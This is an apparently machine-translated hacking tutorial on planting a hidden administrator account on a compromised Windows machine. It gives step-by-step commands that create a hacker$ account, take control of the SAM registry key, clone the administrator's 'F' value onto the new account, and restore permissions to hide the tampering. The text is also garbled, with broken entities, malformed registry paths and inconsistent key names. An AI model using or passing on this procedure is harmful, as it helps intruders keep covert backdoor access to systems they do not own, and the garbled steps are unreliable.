Create a hidden superuser for Windows

I think everyone is familiar with regedit.exe, but I can't set permissions on the registry key. The biggest advantage of regedt32.exe is the ability to set permissions on the registry key. The account information of nt/2000/xp is under the HKEY_LOCAL_MACHINESAMSAM key of the registry, but except for the system user SYSTEM, other users have no right to view the information inside, so I first use the regedt32.exe to set the SAM key for me to &ldquo Full control & quoquo; permissions. This will read and write the information in the SAM key. The specific steps are as follows:

1. Suppose we log in to the broiler with terminal service as the super user administrator. First create an account in the command line or in the account manager: hacker$, here I Create this account under the command line net user hacker$ 1234 /add

2. At the start/run, type: regedt32.exe and press Enter to run regedt32.exe.

3, point & ldquo; permissions & rdquo; will pop up the window point to add the account when I log in to the security bar, here I am logged in as the administrator, so I will add administrator, and Set permissions to “ Full Control ". Here you need to explain: It is best to add the account you are logged into or the group where the account is located, and do not modify the original account or group, otherwise it will bring a series of unnecessary problems. If you hide the super user, you can delete the account you added here.

4, then click "Start”→“Run” and enter "regedit.exe" Enter to start the registry editor regedit.exe. Open the key: HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$"

5. Export the items hacker$, 00000409, and 000001F4 to hacker.reg, 409.reg, 1f4.reg, and edit these exported files with Notepad. Copy the value of the key "F" under the item 000001F4 of the superuser and override the value of the key "F" under the item 00000409 of the hacker$, and then merge 00000409.reg with the hacker.reg.

6. Execute net user hacker$ /del in the command line to delete user hacker$: net user hacker$ /del

7. Press F5 to refresh in regedit.exe window. Then type the file - import the registry file and import the modified hacker.reg into the registry.

8. At this point, the hidden superuser hacker$ has been built, and then regedit.exe is closed. In the regedt32.exe window, change the HKEY_LOCAL_MACHINESAMSAM key permission back to the original state (just delete the added account administrator).

9, Note: After the hidden super user is built, the user in the account manager can't see the hacker$, and the command line can't be seen with the "net user" command, but after the super user is established, , you can not change the password again, if you use the net user command to change the hacker$ password, then the hidden super user will be seen in the account manager, and can not be deleted.